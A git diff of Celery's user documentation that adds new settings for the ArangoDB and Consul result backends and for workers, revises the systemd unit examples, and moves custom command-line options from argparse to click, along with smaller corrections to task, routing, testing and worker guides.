.. _conf-elasticsearch-result-backend:
Elasticsearch backend settings
@@ -1818,6 +1924,16 @@ This is a dict supporting the following keys:
Password to authenticate to the ArangoDB server (optional).
+* ``http_protocol``
+
+ HTTP Protocol in ArangoDB server connection.
+ Defaults to ``http``.
+
+* ``verify``
+
+ HTTPS Verification check while creating the ArangoDB connection.
+ Defaults to ``False``.
+
.. _conf-cosmosdbsql-result-backend:
CosmosDB backend settings (experimental)
@@ -1950,14 +2066,52 @@ without any further configuration. For larger clusters you could use NFS,
Consul K/V store backend settings
---------------------------------
-The Consul backend can be configured using a URL, for example:
+.. note::
+
+ The Consul backend requires the :pypi:`python-consul2` library:
+
+ To install this package use :command:`pip`:
+
+ .. code-block:: console
+
+ $ pip install python-consul2
+
+The Consul backend can be configured using a URL, for example::
CELERY_RESULT_BACKEND = 'consul://localhost:8500/'
-The backend will storage results in the K/V store of Consul
-as individual keys.
+or::
+
+ result_backend = 'consul://localhost:8500/'
+
+The backend will store results in the K/V store of Consul
+as individual keys. The backend supports auto expire of results using TTLs in
+Consul. The full syntax of the URL is::
+
+ consul://host:port[?one_client=1]
+
+The URL is formed out of the following parts:
+
+* ``host``
+
+ Host name of the Consul server.
+
+* ``port``
-The backend supports auto expire of results using TTLs in Consul.
+ The port the Consul server is listening to.
+
+* ``one_client``
+
+ By default, for correctness, the backend uses a separate client connection
+ per operation. In cases of extreme load, the rate of creation of new
+ connections can cause HTTP 429 "too many connections" error responses from
+ the Consul server when under load. The recommended way to handle this is to
+ enable retries in ``python-consul2`` using the patch at
+ https://github.com/poppyred/python-consul2/pull/31.
+
+ Alternatively, if ``one_client`` is set, a single client connection will be
+ used for all operations instead. This should eliminate the HTTP 429 errors,
+ but the storage of results in the backend can become unreliable.
.. _conf-messaging:
@@ -2028,7 +2182,7 @@ Examples:
},
}
- task_routes = ('myapp.tasks.route_task', {'celery.ping': 'default})
+ task_routes = ('myapp.tasks.route_task', {'celery.ping': 'default'})
Where ``myapp.tasks.route_task`` could be:
@@ -2066,7 +2220,7 @@ the final message options will be:
immediate=False, exchange='video', routing_key='video.compress'
(and any default message options defined in the
-:class:`~celery.task.base.Task` class)
+:class:`~celery.app.task.Task` class)
Values defined in :setting:`task_routes` have precedence over values defined in
:setting:`task_queues` when merging the two.
@@ -2100,33 +2254,6 @@ The final routing options for ``tasks.add`` will become:
See :ref:`routers` for more examples.
-.. setting:: task_queue_ha_policy
-
-``task_queue_ha_policy``
-~~~~~~~~~~~~~~~~~~~~~~~~
-:brokers: RabbitMQ
-
-Default: :const:`None`.
-
-This will set the default HA policy for a queue, and the value
-can either be a string (usually ``all``):
-
-.. code-block:: python
-
- task_queue_ha_policy = 'all'
-
-Using 'all' will replicate the queue to all current nodes,
-Or you can give it a list of nodes to replicate to:
-
-.. code-block:: python
-
- task_queue_ha_policy = ['rabbit@host1', 'rabbit@host2']
-
-Using a list will implicitly set ``x-ha-policy`` to 'nodes' and
-``x-ha-policy-params`` to the given list of nodes.
-
-See http://www.rabbitmq.com/ha.html for more information.
-
.. setting:: task_queue_max_priority
``task_queue_max_priority``
@@ -2577,6 +2704,33 @@ to have different import categories.
The modules in this setting are imported after the modules in
:setting:`imports`.
+.. setting:: worker_deduplicate_successful_tasks
+
+``worker_deduplicate_successful_tasks``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. versionadded:: 5.1
+
+Default: False
+
+Before each task execution, instruct the worker to check if this task is
+a duplicate message.
+
+Deduplication occurs only with tasks that have the same identifier,
+enabled late acknowledgment, were redelivered by the message broker
+and their state is ``SUCCESS`` in the result backend.
+
+To avoid overflowing the result backend with queries, a local cache of
+successfully executed tasks is checked before querying the result backend
+in case the task was already successfully executed by the same worker that
+received the task.
+
+This cache can be made persistent by setting the :setting:`worker_state_db`
+setting.
+
+If the result backend is not persistent (the RPC backend, for example),
+this setting is ignored.
+
.. _conf-concurrency:
.. setting:: worker_concurrency
@@ -2711,6 +2865,36 @@ Default: 4.0.
The timeout in seconds (int/float) when waiting for a new worker process to start up.
+.. setting:: worker_cancel_long_running_tasks_on_connection_loss
+
+``worker_cancel_long_running_tasks_on_connection_loss``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. versionadded:: 5.1
+
+Default: Disabled by default.
+
+Kill all long-running tasks with late acknowledgment enabled on connection loss.
+
+Tasks which have not been acknowledged before the connection loss cannot do so
+anymore since their channel is gone and the task is redelivered back to the queue.
+This is why tasks with late acknowledged enabled must be idempotent as they may be executed more than once.
+In this case, the task is being executed twice per connection loss (and sometimes in parallel in other workers).
+
+When turning this option on, those tasks which have not been completed are
+cancelled and their execution is terminated.
+Tasks which have completed in any way before the connection loss
+are recorded as such in the result backend as long as :setting:`task_ignore_result` is not enabled.
+
+.. warning::
+
+ This feature was introduced as a future breaking change.
+ If it is turned off, Celery will emit a warning message.
+
+ In Celery 6.0, the :setting:`worker_cancel_long_running_tasks_on_connection_loss`
+ will be set to ``True`` by default as the current behavior leads to more
+ problems than it solves.
+
.. _conf-events:
Events
@@ -2910,7 +3094,7 @@ Default:
.. code-block:: text
"[%(asctime)s: %(levelname)s/%(processName)s]
- [%(task_name)s(%(task_id)s)] %(message)s"
+ %(task_name)s[%(task_id)s]: %(message)s"
The format to use for log messages logged in tasks.
diff --git a/docs/userguide/daemonizing.rst b/docs/userguide/daemonizing.rst
index 07e39009c97..c2ea8a57645 100644
--- a/docs/userguide/daemonizing.rst
+++ b/docs/userguide/daemonizing.rst
@@ -389,31 +389,39 @@ This is an example systemd file:
.. code-block:: bash
- [Unit]
- Description=Celery Service
- After=network.target
-
- [Service]
- Type=forking
- User=celery
- Group=celery
- EnvironmentFile=/etc/conf.d/celery
- WorkingDirectory=/opt/celery
- ExecStart=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} multi start ${CELERYD_NODES} \
- --pidfile=${CELERYD_PID_FILE} \
- --logfile=${CELERYD_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL} ${CELERYD_OPTS}'
- ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait ${CELERYD_NODES} \
- --pidfile=${CELERYD_PID_FILE}'
- ExecReload=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} multi restart ${CELERYD_NODES} \
- --pidfile=${CELERYD_PID_FILE} \
- --logfile=${CELERYD_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL} ${CELERYD_OPTS}'
-
- [Install]
- WantedBy=multi-user.target
+ [Unit]
+ Description=Celery Service
+ After=network.target
+
+ [Service]
+ Type=forking
+ User=celery
+ Group=celery
+ EnvironmentFile=/etc/conf.d/celery
+ WorkingDirectory=/opt/celery
+ ExecStart=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi start $CELERYD_NODES \
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
+ --loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS'
+ ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait $CELERYD_NODES \
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
+ --loglevel="${CELERYD_LOG_LEVEL}"'
+ ExecReload=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi restart $CELERYD_NODES \
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
+ --loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS'
+ Restart=always
+
+ [Install]
+ WantedBy=multi-user.target
Once you've put that file in :file:`/etc/systemd/system`, you should run
:command:`systemctl daemon-reload` in order that Systemd acknowledges that file.
You should also run that command each time you modify it.
+Use :command:`systemctl enable celery.service` if you want the celery service to
+automatically start when (re)booting the system.
+
+Optionally you can specify extra dependencies for the celery service: e.g. if you use
+RabbitMQ as a broker, you could specify ``rabbitmq-server.service`` in both ``After=`` and ``Requires=``
+in the ``[Unit]`` `systemd section `_.
To configure user, group, :command:`chdir` change settings:
``User``, ``Group``, and ``WorkingDirectory`` defined in
@@ -425,7 +433,7 @@ You can also use systemd-tmpfiles in order to create working directories (for lo
.. code-block:: bash
- d /var/run/celery 0755 celery celery -
+ d /run/celery 0755 celery celery -
d /var/log/celery 0755 celery celery -
@@ -482,23 +490,29 @@ This is an example systemd file for Celery Beat:
.. code-block:: bash
- [Unit]
- Description=Celery Beat Service
- After=network.target
+ [Unit]
+ Description=Celery Beat Service
+ After=network.target
- [Service]
- Type=simple
- User=celery
- Group=celery
- EnvironmentFile=/etc/conf.d/celery
- WorkingDirectory=/opt/celery
- ExecStart=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} beat \
- --pidfile=${CELERYBEAT_PID_FILE} \
- --logfile=${CELERYBEAT_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL}'
+ [Service]
+ Type=simple
+ User=celery
+ Group=celery
+ EnvironmentFile=/etc/conf.d/celery
+ WorkingDirectory=/opt/celery
+ ExecStart=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} beat \
+ --pidfile=${CELERYBEAT_PID_FILE} \
+ --logfile=${CELERYBEAT_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL}'
+ Restart=always
- [Install]
- WantedBy=multi-user.target
+ [Install]
+ WantedBy=multi-user.target
+Once you've put that file in :file:`/etc/systemd/system`, you should run
+:command:`systemctl daemon-reload` in order that Systemd acknowledges that file.
+You should also run that command each time you modify it.
+Use :command:`systemctl enable celerybeat.service` if you want the celery beat
+service to automatically start when (re)booting the system.
Running the worker with superuser privileges (root)
======================================================================
diff --git a/docs/userguide/debugging.rst b/docs/userguide/debugging.rst
index 4eeb539be36..690e2acb4bd 100644
--- a/docs/userguide/debugging.rst
+++ b/docs/userguide/debugging.rst
@@ -110,7 +110,7 @@ For example starting the worker with:
.. code-block:: console
- $ CELERY_RDBSIG=1 celery worker -l info
+ $ CELERY_RDBSIG=1 celery worker -l INFO
You can start an rdb session for any of the worker processes by executing:
diff --git a/docs/userguide/extending.rst b/docs/userguide/extending.rst
index 969eb72a51c..59c8f83401e 100644
--- a/docs/userguide/extending.rst
+++ b/docs/userguide/extending.rst
@@ -301,6 +301,32 @@ Another example could use the timer to wake up at regular intervals:
if req.time_start and time() - req.time_start > self.timeout:
raise SystemExit()
+Customizing Task Handling Logs
+------------------------------
+
+The Celery worker emits messages to the Python logging subsystem for various
+events throughout the lifecycle of a task.
+These messages can be customized by overriding the ``LOG_`` format
+strings which are defined in :file:`celery/app/trace.py`.
+For example:
+
+.. code-block:: python
+
+ import celery.app.trace
+
+ celery.app.trace.LOG_SUCCESS = "This is a custom message"
+
+The various format strings are all provided with the task name and ID for
+``%`` formatting, and some of them receive extra fields like the return value
+or the exception which caused a task to fail.
+These fields can be used in custom format strings like so:
+
+.. code-block:: python
+
+ import celery.app.trace
+
+ celery.app.trace.LOG_REJECTED = "%(name)r is cursed and I won't run it: %(exc)s"
+
.. _extending-consumer_blueprint:
Consumer
@@ -729,25 +755,22 @@ You can add additional command-line options to the ``worker``, ``beat``, and
``events`` commands by modifying the :attr:`~@user_options` attribute of the
application instance.
-Celery commands uses the :mod:`argparse` module to parse command-line
-arguments, and so to add custom arguments you need to specify a callback
-that takes a :class:`argparse.ArgumentParser` instance - and adds arguments.
-Please see the :mod:`argparse` documentation to read about the fields supported.
+Celery commands uses the :mod:`click` module to parse command-line
+arguments, and so to add custom arguments you need to add :class:`click.Option` instances
+to the relevant set.
Example adding a custom option to the :program:`celery worker` command:
.. code-block:: python
from celery import Celery
+ from click import Option
app = Celery(broker='amqp://')
- def add_worker_arguments(parser):
- parser.add_argument(
- '--enable-my-option', action='store_true', default=False,
- help='Enable custom option.',
- ),
- app.user_options['worker'].add(add_worker_arguments)
+ app.user_options['worker'].add(Option(('--enable-my-option',),
+ is_flag=True,
+ help='Enable custom option.'))
All bootsteps will now receive this argument as a keyword argument to
@@ -772,29 +795,22 @@ Preload options
~~~~~~~~~~~~~~~
The :program:`celery` umbrella command supports the concept of 'preload
-options'. These are special options passed to all sub-commands and parsed
-outside of the main parsing step.
-
-The list of default preload options can be found in the API reference:
-:mod:`celery.bin.base`.
+options'. These are special options passed to all sub-commands.
-You can add new preload options too, for example to specify a configuration
+You can add new preload options, for example to specify a configuration
template:
.. code-block:: python
from celery import Celery
from celery import signals
- from celery.bin import Option
+ from click import Option
app = Celery()
- def add_preload_options(parser):
- parser.add_argument(
- '-Z', '--template', default='default',
- help='Configuration template to use.',
- )
- app.user_options['preload'].add(add_preload_options)
+ app.user_options['preload'].add(Option(('-Z', '--template'),
+ default='default',
+ help='Configuration template to use.'))
@signals.user_preload_options.connect
def on_preload_parsed(options, **kwargs):
@@ -816,12 +832,10 @@ Entry-points is special meta-data that can be added to your packages ``setup.py`
and then after installation, read from the system using the :mod:`pkg_resources` module.
Celery recognizes ``celery.commands`` entry-points to install additional
-sub-commands, where the value of the entry-point must point to a valid subclass
-of :class:`celery.bin.base.Command`. There's limited documentation,
-unfortunately, but you can find inspiration from the various commands in the
-:mod:`celery.bin` package.
+sub-commands, where the value of the entry-point must point to a valid click
+command.
-This is how the :pypi:`Flower` monitoring extension adds the :program:`celery flower` command,
+This is how the :pypi:`Flower` monitoring extension may add the :program:`celery flower` command,
by adding an entry-point in :file:`setup.py`:
.. code-block:: python
@@ -830,44 +844,35 @@ by adding an entry-point in :file:`setup.py`:
name='flower',
entry_points={
'celery.commands': [
- 'flower = flower.command:FlowerCommand',
+ 'flower = flower.command:flower',
],
}
)
The command definition is in two parts separated by the equal sign, where the
first part is the name of the sub-command (flower), then the second part is
-the fully qualified symbol path to the class that implements the command:
+the fully qualified symbol path to the function that implements the command:
.. code-block:: text
- flower.command:FlowerCommand
+ flower.command:flower
The module path and the name of the attribute should be separated by colon
as above.
-In the module :file:`flower/command.py`, the command class is defined
-something like this:
+In the module :file:`flower/command.py`, the command function may be defined
+as the following:
.. code-block:: python
- from celery.bin.base import Command
-
-
- class FlowerCommand(Command):
-
- def add_arguments(self, parser):
- parser.add_argument(
- '--port', default=8888, type='int',
- help='Webserver port',
- ),
- parser.add_argument(
- '--debug', action='store_true',
- )
+ import click
- def run(self, port=None, debug=False, **kwargs):
- print('Running our command')
+ @click.command()
+ @click.option('--port', default=8888, type=int, help='Webserver port')
+ @click.option('--debug', is_flag=True)
+ def flower(port, debug):
+ print('Running our command')
Worker API
diff --git a/docs/userguide/monitoring.rst b/docs/userguide/monitoring.rst
index 40e9991b572..725f264057f 100644
--- a/docs/userguide/monitoring.rst
+++ b/docs/userguide/monitoring.rst
@@ -33,7 +33,7 @@ To list all the commands available do:
.. code-block:: console
- $ celery help
+ $ celery --help
or to get help for a specific command do:
diff --git a/docs/userguide/periodic-tasks.rst b/docs/userguide/periodic-tasks.rst
index e68bcd26c50..718f4c8af90 100644
--- a/docs/userguide/periodic-tasks.rst
+++ b/docs/userguide/periodic-tasks.rst
@@ -107,12 +107,18 @@ beat schedule list.
def test(arg):
print(arg)
+ @app.task
+ def add(x, y):
+ z = x + y
+ print(z)
+
+
Setting these up from within the :data:`~@on_after_configure` handler means
-that we'll not evaluate the app at module level when using ``test.s()``. Note that
+that we'll not evaluate the app at module level when using ``test.s()``. Note that
:data:`~@on_after_configure` is sent after the app is set up, so tasks outside the
-module where the app is declared (e.g. in a `tasks.py` file located by
-:meth:`celery.Celery.autodiscover_tasks`) must use a later signal, such as
+module where the app is declared (e.g. in a `tasks.py` file located by
+:meth:`celery.Celery.autodiscover_tasks`) must use a later signal, such as
:data:`~@on_after_finalize`.
The :meth:`~@add_periodic_task` function will add the entry to the
@@ -186,7 +192,7 @@ Available Fields
Execution options (:class:`dict`).
This can be any argument supported by
- :meth:`~celery.task.base.Task.apply_async` --
+ :meth:`~celery.app.task.Task.apply_async` --
`exchange`, `routing_key`, `expires`, and so on.
* `relative`
@@ -463,7 +469,7 @@ To install and use this extension:
.. code-block:: console
- $ celery -A proj beat -l info --scheduler django_celery_beat.schedulers:DatabaseScheduler
+ $ celery -A proj beat -l INFO --scheduler django_celery_beat.schedulers:DatabaseScheduler
Note: You may also add this as the :setting:`beat_scheduler` setting directly.
diff --git a/docs/userguide/routing.rst b/docs/userguide/routing.rst
index 300c655a12d..1dbac6807cf 100644
--- a/docs/userguide/routing.rst
+++ b/docs/userguide/routing.rst
@@ -274,22 +274,34 @@ To start scheduling tasks based on priorities you need to configure queue_order_
The priority support is implemented by creating n lists for each queue.
This means that even though there are 10 (0-9) priority levels, these are
consolidated into 4 levels by default to save resources. This means that a
-queue named celery will really be split into 4 queues:
+queue named celery will really be split into 4 queues.
+
+The highest priority queue will be named celery, and the the other queues will
+have a separator (by default `\x06\x16`) and their priority number appended to
+the queue name.
.. code-block:: python
- ['celery0', 'celery3', 'celery6', 'celery9']
+ ['celery', 'celery\x06\x163', 'celery\x06\x166', 'celery\x06\x169']
-If you want more priority levels you can set the priority_steps transport option:
+If you want more priority levels or a different separator you can set the
+priority_steps and sep transport options:
.. code-block:: python
app.conf.broker_transport_options = {
'priority_steps': list(range(10)),
+ 'sep': ':',
'queue_order_strategy': 'priority',
}
+The config above will give you these queue names:
+
+.. code-block:: python
+
+ ['celery', 'celery:1', 'celery:2', 'celery:3', 'celery:4', 'celery:5', 'celery:6', 'celery:7', 'celery:8', 'celery:9']
+
That said, note that this will never be as good as priorities implemented at the
server level, and may be approximate at best. But it may still be good enough
@@ -624,7 +636,7 @@ Specifying task destination
The destination for a task is decided by the following (in order):
1. The routing arguments to :func:`Task.apply_async`.
-2. Routing related attributes defined on the :class:`~celery.task.base.Task`
+2. Routing related attributes defined on the :class:`~celery.app.task.Task`
itself.
3. The :ref:`routers` defined in :setting:`task_routes`.
diff --git a/docs/userguide/tasks.rst b/docs/userguide/tasks.rst
index 58e4125cac9..49c4dd68337 100644
--- a/docs/userguide/tasks.rst
+++ b/docs/userguide/tasks.rst
@@ -64,11 +64,12 @@ consider enabling the :setting:`task_reject_on_worker_lost` setting.
the process by force so only use them to detect cases where you haven't
used manual timeouts yet.
- The default prefork pool scheduler is not friendly to long-running tasks,
- so if you have tasks that run for minutes/hours make sure you enable
- the :option:`-Ofair ` command-line argument to
- the :program:`celery worker`. See :ref:`optimizing-prefetch-limit` for more
- information, and for the best performance route long-running and
+ In previous versions, the default prefork pool scheduler was not friendly
+ to long-running tasks, so if you had tasks that ran for minutes/hours, it
+ was advised to enable the :option:`-Ofair ` command-line
+ argument to the :program:`celery worker`. However, as of version 4.0,
+ -Ofair is now the default scheduling strategy. See :ref:`optimizing-prefetch-limit`
+ for more information, and for the best performance route long-running and
short-running tasks to dedicated workers (:ref:`routing-automatic`).
If your worker hangs then please investigate what tasks are running
@@ -91,7 +92,7 @@ Basics
======
You can easily create a task from any callable by using
-the :meth:`~@task` decorator:
+the :meth:`@task` decorator:
.. code-block:: python
@@ -153,7 +154,7 @@ be the task instance (``self``), just like Python bound methods:
logger = get_task_logger(__name__)
- @task(bind=True)
+ @app.task(bind=True)
def add(self, x, y):
logger.info(self.request.id)
@@ -175,7 +176,7 @@ The ``base`` argument to the task decorator specifies the base class of the task
def on_failure(self, exc, task_id, args, kwargs, einfo):
print('{0!r} failed: {1!r}'.format(task_id, exc))
- @task(base=MyTask)
+ @app.task(base=MyTask)
def add(x, y):
raise KeyError()
@@ -236,92 +237,6 @@ named :file:`tasks.py`:
>>> add.name
'tasks.add'
-.. _task-naming-relative-imports:
-
-Automatic naming and relative imports
--------------------------------------
-
-.. sidebar:: Absolute Imports
-
- The best practice for developers targeting Python 2 is to add the
- following to the top of **every module**:
-
- .. code-block:: python
-
- from __future__ import absolute_import
-
- This will force you to always use absolute imports so you will
- never have any problems with tasks using relative names.
-
- Absolute imports are the default in Python 3 so you don't need this
- if you target that version.
-
-Relative imports and automatic name generation don't go well together,
-so if you're using relative imports you should set the name explicitly.
-
-For example if the client imports the module ``"myapp.tasks"``
-as ``".tasks"``, and the worker imports the module as ``"myapp.tasks"``,
-the generated names won't match and an :exc:`~@NotRegistered` error will
-be raised by the worker.
-
-This is also the case when using Django and using ``project.myapp``-style
-naming in ``INSTALLED_APPS``:
-
-.. code-block:: python
-
- INSTALLED_APPS = ['project.myapp']
-
-If you install the app under the name ``project.myapp`` then the
-tasks module will be imported as ``project.myapp.tasks``,
-so you must make sure you always import the tasks using the same name:
-
-.. code-block:: pycon
-
- >>> from project.myapp.tasks import mytask # << GOOD
-
- >>> from myapp.tasks import mytask # << BAD!!!
-
-The second example will cause the task to be named differently
-since the worker and the client imports the modules under different names:
-
-.. code-block:: pycon
-
- >>> from project.myapp.tasks import mytask
- >>> mytask.name
- 'project.myapp.tasks.mytask'
-
- >>> from myapp.tasks import mytask
- >>> mytask.name
- 'myapp.tasks.mytask'
-
-For this reason you must be consistent in how you
-import modules, and that is also a Python best practice.
-
-Similarly, you shouldn't use old-style relative imports:
-
-.. code-block:: python
-
- from module import foo # BAD!
-
- from proj.module import foo # GOOD!
-
-New-style relative imports are fine and can be used:
-
-.. code-block:: python
-
- from .module import foo # GOOD!
-
-If you want to use Celery with a project already using these patterns
-extensively and you don't have the time to refactor the existing code
-then you can consider specifying the names explicitly instead of relying
-on the automatic naming:
-
-.. code-block:: python
-
- @task(name='proj.tasks.add')
- def add(x, y):
- return x + y
-
.. _task-name-generator-info:
Changing the automatic naming behavior
@@ -359,7 +274,7 @@ may contain:
def gen_task_name(self, name, module):
if module.endswith('.tasks'):
module = module[:-6]
- return super(MyCelery, self).gen_task_name(name, module)
+ return super().gen_task_name(name, module)
app = MyCelery('main')
@@ -457,6 +372,14 @@ The request defines the following attributes:
current task. If using version one of the task protocol the chain
tasks will be in ``request.callbacks`` instead.
+.. versionadded:: 5.2
+
+:properties: Mapping of message properties received with this task message
+ (may be :const:`None` or :const:`{}`)
+
+:replaced_task_nesting: How many times the task was replaced, if at all.
+ (may be :const:`0`)
+
Example
-------
@@ -742,7 +665,7 @@ Sometimes you just want to retry a task whenever a particular exception
is raised.
Fortunately, you can tell Celery to automatically retry a task using
-`autoretry_for` argument in the :meth:`~@Celery.task` decorator:
+`autoretry_for` argument in the :meth:`@task` decorator:
.. code-block:: python
@@ -753,7 +676,7 @@ Fortunately, you can tell Celery to automatically retry a task using
return twitter.refresh_timeline(user)
If you want to specify custom arguments for an internal :meth:`~@Task.retry`
-call, pass `retry_kwargs` argument to :meth:`~@Celery.task` decorator:
+call, pass `retry_kwargs` argument to :meth:`@task` decorator:
.. code-block:: python
@@ -805,13 +728,13 @@ via options documented below.
.. versionadded:: 4.4
-You can also set `autoretry_for`, `retry_kwargs`, `retry_backoff`, `retry_backoff_max` and `retry_jitter` options in class-based tasks:
+You can also set `autoretry_for`, `max_retries`, `retry_backoff`, `retry_backoff_max` and `retry_jitter` options in class-based tasks:
.. code-block:: python
class BaseTaskWithRetry(Task):
autoretry_for = (TypeError,)
- retry_kwargs = {'max_retries': 5}
+ max_retries = 5
retry_backoff = True
retry_backoff_max = 700
retry_jitter = False
@@ -822,12 +745,10 @@ You can also set `autoretry_for`, `retry_kwargs`, `retry_backoff`, `retry_backof
during the execution of the task, the task will automatically be retried.
By default, no exceptions will be autoretried.
-.. attribute:: Task.retry_kwargs
+.. attribute:: Task.max_retries
- A dictionary. Use this to customize how autoretries are executed.
- Note that if you use the exponential backoff options below, the `countdown`
- task option will be determined by Celery's autoretry system, and any
- `countdown` included in this dictionary will be ignored.
+ A number. Maximum number of retries before giving up. A value of ``None``
+ means task will retry forever. By default, this option is set to ``3``.
.. attribute:: Task.retry_backoff
@@ -1522,6 +1443,18 @@ The default value is the class provided by Celery: ``'celery.app.task:Task'``.
Handlers
--------
+.. method:: before_start(self, task_id, args, kwargs)
+
+ Run by the worker before the task starts executing.
+
+ .. versionadded:: 5.2
+
+ :param task_id: Unique id of the task to execute.
+ :param args: Original arguments for the task to execute.
+ :param kwargs: Original keyword arguments for the task to execute.
+
+ The return value of this handler is ignored.
+
.. method:: after_return(self, status, retval, task_id, args, kwargs, einfo)
Handler called after the task returns.
@@ -1607,6 +1540,7 @@ limits, and other failures.
.. code-block:: python
import logging
+ from celery import Task
from celery.worker.request import Request
logger = logging.getLogger('my.package')
@@ -1623,7 +1557,7 @@ limits, and other failures.
)
def on_failure(self, exc_info, send_failed_event=True, return_ok=False):
- super(Request, self).on_failure(
+ super().on_failure(
exc_info,
send_failed_event=send_failed_event,
return_ok=return_ok
diff --git a/docs/userguide/testing.rst b/docs/userguide/testing.rst
index 4deccd0f15c..3f2f15ba680 100644
--- a/docs/userguide/testing.rst
+++ b/docs/userguide/testing.rst
@@ -18,6 +18,9 @@ To test task behavior in unit tests the preferred method is mocking.
of what happens in a worker, and there are many discrepancies
between the emulation and what happens in reality.
+ Note that eagerly executed tasks don't write results to backend by default.
+ If you want to enable this functionality, have a look at :setting:`task_store_eager_result`.
+
A Celery task is much like a web view, in that it should only
define how to perform the action in the context of being called as a task.
@@ -103,9 +106,10 @@ Enabling
Celery initially ships the plugin in a disabled state, to enable it you can either:
- * `pip install celery[pytest]`
- * `pip install pytest-celery`
- * or add `pytest_plugins = 'celery.contrib.pytest'` to your pytest.ini
+ * ``pip install celery[pytest]``
+ * ``pip install pytest-celery``
+ * or add an environment variable ``PYTEST_PLUGINS=celery.contrib.pytest``
+ * or add ``pytest_plugins = ("celery.contrib.pytest", )`` to your root conftest.py
Marks
@@ -166,6 +170,11 @@ This fixture starts a Celery worker instance that you can use
for integration tests. The worker will be started in a *separate thread*
and will be shutdown as soon as the test returns.
+By default the fixture will wait up to 10 seconds for the worker to complete
+outstanding tasks and will raise an exception if the time limit is exceeded.
+The timeout can be customized by setting the ``shutdown_timeout`` key in the
+dictionary returned by the :func:`celery_worker_parameters` fixture.
+
Example:
.. code-block:: python
@@ -188,6 +197,20 @@ Example:
def test_other(celery_worker):
...
+Heartbeats are disabled by default which means that the test worker doesn't
+send events for ``worker-online``, ``worker-offline`` and ``worker-heartbeat``.
+To enable heartbeats modify the :func:`celery_worker_parameters` fixture:
+
+.. code-block:: python
+
+ # Put this in your conftest.py
+ @pytest.fixture(scope="session")
+ def celery_worker_parameters():
+ return {"without_heartbeat": False}
+ ...
+
+
+
Session scope
^^^^^^^^^^^^^
diff --git a/docs/userguide/workers.rst b/docs/userguide/workers.rst
index 098d3005f68..1e51c915e67 100644
--- a/docs/userguide/workers.rst
+++ b/docs/userguide/workers.rst
@@ -23,7 +23,7 @@ You can start the worker in the foreground by executing the command:
.. code-block:: console
- $ celery -A proj worker -l info
+ $ celery -A proj worker -l INFO
For a full list of available command-line options see
:mod:`~celery.bin.worker`, or simply do:
@@ -97,6 +97,11 @@ longer version:
$ ps auxww | awk '/celery worker/ {print $2}' | xargs kill -9
+.. versionchanged:: 5.2
+ On Linux systems, Celery now supports sending :sig:`KILL` signal to all child processes
+ after worker termination. This is done via `PR_SET_PDEATHSIG` option of ``prctl(2)``.
+
+
.. _worker-restarting:
Restarting the worker
@@ -108,7 +113,7 @@ is by using `celery multi`:
.. code-block:: console
- $ celery multi start 1 -A proj -l info -c4 --pidfile=/var/run/celery/%n.pid
+ $ celery multi start 1 -A proj -l INFO -c4 --pidfile=/var/run/celery/%n.pid
$ celery multi restart 1 --pidfile=/var/run/celery/%n.pid
For production deployments you should be using init-scripts or a process
@@ -324,7 +329,7 @@ Commands
``revoke``: Revoking tasks
--------------------------
-:pool support: all, terminate only supported by prefork
+:pool support: all, terminate only supported by prefork and eventlet
:broker support: *amqp, redis*
:command: :program:`celery -A proj control revoke `
@@ -410,7 +415,7 @@ argument to :program:`celery worker`:
.. code-block:: console
- $ celery -A proj worker -l info --statedb=/var/run/celery/worker.state
+ $ celery -A proj worker -l INFO --statedb=/var/run/celery/worker.state
or if you use :program:`celery multi` you want to create one file per
worker instance so use the `%n` format to expand the current node
@@ -418,7 +423,7 @@ name:
.. code-block:: console
- celery multi start 2 -l info --statedb=/var/run/celery/%n.state
+ celery multi start 2 -l INFO --statedb=/var/run/celery/%n.state
See also :ref:`worker-files`
@@ -434,7 +439,7 @@ Time Limits
.. versionadded:: 2.0
-:pool support: *prefork/gevent*
+:pool support: *prefork/gevent (see note below)*
.. sidebar:: Soft, or hard?
@@ -474,6 +479,11 @@ Time limits can also be set using the :setting:`task_time_limit` /
Time limits don't currently work on platforms that don't support
the :sig:`SIGUSR1` signal.
+.. note::
+
+ The gevent pool does not implement soft time limits. Additionally,
+ it will not enforce the hard time limit if the task is blocking.
+
Changing time limits at run-time
--------------------------------
@@ -611,7 +621,7 @@ separated list of queues to the :option:`-Q ` option:
.. code-block:: console
- $ celery -A proj worker -l info -Q foo,bar,baz
+ $ celery -A proj worker -l INFO -Q foo,bar,baz
If the queue name is defined in :setting:`task_queues` it will use that
configuration, but if it's not defined in the list of queues Celery will
@@ -732,7 +742,7 @@ to specify the workers that should reply to the request:
This can also be done programmatically by using the
-:meth:`@control.inspect.active_queues` method:
+:meth:`~celery.app.control.Inspect.active_queues` method:
.. code-block:: pycon
@@ -771,7 +781,7 @@ Dump of registered tasks
------------------------
You can get a list of tasks registered in the worker using the
-:meth:`~@control.inspect.registered`:
+:meth:`~celery.app.control.Inspect.registered`:
.. code-block:: pycon
@@ -785,7 +795,7 @@ Dump of currently executing tasks
---------------------------------
You can get a list of active tasks using
-:meth:`~@control.inspect.active`:
+:meth:`~celery.app.control.Inspect.active`:
.. code-block:: pycon
@@ -802,7 +812,7 @@ Dump of scheduled (ETA) tasks
-----------------------------
You can get a list of tasks waiting to be scheduled by using
-:meth:`~@control.inspect.scheduled`:
+:meth:`~celery.app.control.Inspect.scheduled`:
.. code-block:: pycon
@@ -834,7 +844,7 @@ Reserved tasks are tasks that have been received, but are still waiting to be
executed.
You can get a list of these using
